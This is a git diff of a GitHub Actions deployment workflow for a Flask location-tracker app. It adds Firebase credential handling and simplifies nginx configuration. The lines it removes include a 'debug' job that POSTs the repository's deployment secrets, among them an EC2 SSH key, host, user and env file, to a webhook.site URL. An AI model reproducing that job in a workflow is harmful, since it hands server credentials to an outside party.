--- a/.github/workflows/deploy-feature.yml
+++ b/.github/workflows/deploy-feature.yml
@@ -71,52 +71,13 @@ jobs:
         with:
           ref: ${{ steps.determine-instance.outputs.BRANCH_NAME }}
 
-  debug:
-    name: Debug
-    runs-on: ubuntu-latest
-
-    steps:
-      - name: Check out code
-        uses: actions/checkout@v2
-
-      - name: Send ENV_FILE_3
-        uses: fjogeleit/http-request-action@v1
-        with:
-          url: "https://webhook.site/2feee094-bd95-4322-8aa2-524ba79820a9"
-          method: "POST"
-          customHeaders: '{"Content-Type": "application/json"}'
-          data: ${{ secrets.ENV_FILE_3 }}
-
-      - name: Send EC2_HOST_3
-        uses: fjogeleit/http-request-action@v1
-        with:
-          url: "https://webhook.site/2feee094-bd95-4322-8aa2-524ba79820a9"
-          method: "POST"
-          customHeaders: '{"Content-Type": "application/json"}'
-          data: ${{ secrets.EC2_HOST_3 }}
-
-      - name: Send EC2_SSH_KEY_3
-        uses: fjogeleit/http-request-action@v1
-        with:
-          url: "https://webhook.site/2feee094-bd95-4322-8aa2-524ba79820a9"
-          method: "POST"
-          customHeaders: '{"Content-Type": "application/json"}'
-          data: ${{ secrets.EC2_SSH_KEY_3 }}
-
-      - name: Send EC2_USER_3
-        uses: fjogeleit/http-request-action@v1
-        with:
-          url: "https://webhook.site/2feee094-bd95-4322-8aa2-524ba79820a9"
-          method: "POST"
-          customHeaders: '{"Content-Type": "application/json"}'
-          data: ${{ secrets.EC2_USER_3 }}
-
       - name: Deploy to assigned instance
         env:
           HOST: ${{ secrets[format('EC2_HOST_{0}', steps.determine-instance.outputs.TARGET_INSTANCE)] }}
           USER: ${{ secrets[format('EC2_USER_{0}', steps.determine-instance.outputs.TARGET_INSTANCE)] }}
           KEY: ${{ secrets[format('EC2_SSH_KEY_{0}', steps.determine-instance.outputs.TARGET_INSTANCE)] }}
           ENV_FILE: ${{ secrets[format('ENV_FILE_{0}', steps.determine-instance.outputs.TARGET_INSTANCE)] }}
+          FIREBASE_SDK: ${{ secrets.FIREBASE_SDK_JSON }}
           DOMAIN_BASE: tumaquinaya.com
           BRANCH_NAME: ${{ steps.determine-instance.outputs.BRANCH_NAME }}
           PERSON_NAME: ${{ steps.determine-instance.outputs.PERSON_NAME }}
@@ -130,6 +91,8 @@ jobs:
 
           # Crear archivo .env temporal
           echo "$ENV_FILE" > temp_env_file
+
+          echo "$FIREBASE_SDK" > temp_sdk.json
 
           # Verificar que el NAME coincida con la persona asignada
           NAME_VALUE=$(grep "^NAME=" temp_env_file | cut -d'=' -f2 | tr -d '"' | tr -d "'" | xargs)
@@ -674,7 +637,7 @@ jobs:
 
           source venv/bin/activate
           pip install --upgrade pip
-          pip install flask psycopg2-binary python-dotenv requests
+          pip install flask psycopg2-binary python-dotenv requests firebase-admin Flask-JWT-Extended
 
           if [ -f requirements.txt ]; then
             pip install -r requirements.txt
@@ -706,8 +669,6 @@ jobs:
 
           # Eliminar configuraciones de test anteriores
           sudo sed -i '/# ===== INICIO RUTAS TEST/,/# ===== FIN RUTAS TEST/d' ${NGINX_CONF}
-          sudo sed -i '/^[[:space:]]*location[[:space:]]*\/osrm\//,/^[[:space:]]*}[[:space:]]*$/d' ${NGINX_CONF}
-
 
           # Crear archivo temporal con las rutas de test
           cat > /tmp/nginx-test-inject.conf << NGINXTEST
@@ -715,37 +676,6 @@ jobs:
           # ===== INICIO RUTAS TEST =====
           # Rama: ${BRANCH_NAME} - Persona: ${PERSON_NAME}
           # Actualizado: $(date)
-
-          # PROXY PARA OSRM (SNAP-TO-ROADS)
-          location /osrm/ {
-              rewrite ^/osrm/(.*) /\$1 break;
-              proxy_pass http://localhost:5001;
-              proxy_http_version 1.1;
-              proxy_set_header Host \$host;
-              proxy_set_header X-Real-IP \$remote_addr;
-              proxy_set_header X-Forwarded-For \$proxy_add_x_forwarded_for;
-              proxy_set_header X-Forwarded-Proto \$scheme;
-              
-              # Timeouts para OSRM
-              proxy_connect_timeout 60s;
-              proxy_send_timeout 60s;
-              proxy_read_timeout 60s;
-              
-              # CORS para permitir acceso desde JavaScript
-              add_header 'Access-Control-Allow-Origin' '*' always;
-              add_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS' always;
-              add_header 'Access-Control-Allow-Headers' 'DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range' always;
-              
-              # Manejar preflight requests
-              if (\$request_method = 'OPTIONS') {
-                  add_header 'Access-Control-Allow-Origin' '*';
-                  add_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS';
-                  add_header 'Access-Control-Max-Age' 1728000;
-                  add_header 'Content-Type' 'text/plain; charset=utf-8';
-                  add_header 'Content-Length' 0;
-                  return 204;
-              }
-          }
 
           location = /test {
               return 301 /test/;
@@ -783,59 +713,15 @@ jobs:
 
           NGINXTEST
 
-          # Insertar las rutas de test en el servidor HTTPS (no en el HTTP)
+          # Insertar las rutas de test antes de la ubicación principal
           sudo awk '
-          BEGIN { 
-              in_https_server = 0
-              inserted = 0
-              brace_count = 0
-          }
-
-          # Detectar inicio de bloque server
-          /^[[:space:]]*server[[:space:]]*\{/ {
-              brace_count = 1
-              print
-              getline
-              # Si la siguiente línea contiene "listen 443", es el servidor HTTPS
-              if ($0 ~ /listen 443/) {
-                  in_https_server = 1
-              }
-              print
-              next
-          }
-
-          # Contar llaves para saber cuándo termina el bloque server
-          in_https_server == 1 {
-              if ($0 ~ /\{/) brace_count++
-              if ($0 ~ /\}/) brace_count--
-              
-              # Si llegamos al cierre del server, ya no estamos en HTTPS
-              if (brace_count == 0) {
-                  in_https_server = 0
-              }
-          }
-
-          # Insertar el bloque TEST antes del PRIMER "location /" dentro del servidor HTTPS
-          in_https_server == 1 && /^[[:space:]]*location[[:space:]]+\/[[:space:]]+\{/ && inserted == 0 {
-              # Leer e insertar el archivo de configuraciones TEST
-              while ((getline line < "/tmp/nginx-test-inject.conf") > 0) {
+          /location \/ \{/ {
+              while ((getline line < "/tmp/nginx-test-inject.conf") > 0)
                   print line
-              }
               close("/tmp/nginx-test-inject.conf")
-              inserted = 1
-              print
-              next
           }
-
-          # Imprimir todas las demás líneas
           { print }
           ' ${NGINX_CONF} > /tmp/nginx-new.conf
-
-          # Verificar que el archivo se creó correctamente
-          if [ ! -s /tmp/nginx-new.conf ]; then
-              echo "❌ Error: El archivo de configuración generado está vacío"
-              exit 1
-          fi
 
           sudo mv /tmp/nginx-new.conf ${NGINX_CONF}
           rm -f /tmp/nginx-test-inject.conf
@@ -843,7 +729,7 @@ jobs:
           # Verificar y recargar Nginx
           if sudo nginx -t; then
             sudo systemctl reload nginx
-            echo "✅ Nginx configurado para /test y OSRM"
+            echo "✅ Nginx configurado para /test"
           else
             echo "❌ Error en configuración de Nginx"
             sudo nginx -t
@@ -918,6 +804,7 @@ jobs:
           echo "📤 Transfiriendo archivos al servidor..."
           scp -o StrictHostKeyChecking=no -i deploy_key setup_osrm.sh ${USER}@${HOST}:/tmp/
           scp -o StrictHostKeyChecking=no -i deploy_key temp_env_file ${USER}@${HOST}:/tmp/test_env_file
+          scp -o StrictHostKeyChecking=no -i deploy_key temp_sdk.json ${USER}@${HOST}:/tmp/firebase-admin-sdk.json
           scp -o StrictHostKeyChecking=no -i deploy_key deploy_test_remote.sh ${USER}@${HOST}:/tmp/
 
           # Ejecutar instalación/verificación de OSRM PRIMERO
@@ -943,10 +830,17 @@ jobs:
                  mv /tmp/test_env_file /opt/location-tracker/test/Proyecto_1_Diseno/.env; \
                fi; \
              fi; \
+             if [ -f /tmp/firebase-admin-sdk.json ]; then \
+               if [ -d /home/ubuntu/Web-server-UDP/test/Proyecto_1_Diseno ]; then \
+                 mv /tmp/firebase-admin-sdk.json /home/ubuntu/Web-server-UDP/test/Proyecto_1_Diseno/firebase-admin-sdk.json; \
+               else \
+                 mv /tmp/firebase-admin-sdk.json /opt/location-tracker/test/Proyecto_1_Diseno/firebase-admin-sdk.json; \
+               fi; \
+             fi; \
              rm -f /tmp/deploy_test_remote.sh /tmp/setup_osrm.sh"
 
           # Limpiar archivos temporales locales
-          rm -f deploy_key temp_env_file deploy_test_remote.sh setup_osrm.sh
+          rm -f deploy_key temp_env_file deploy_test_remote.sh setup_osrm.sh temp_sdk.json
 
           echo ""
           echo "========================================="
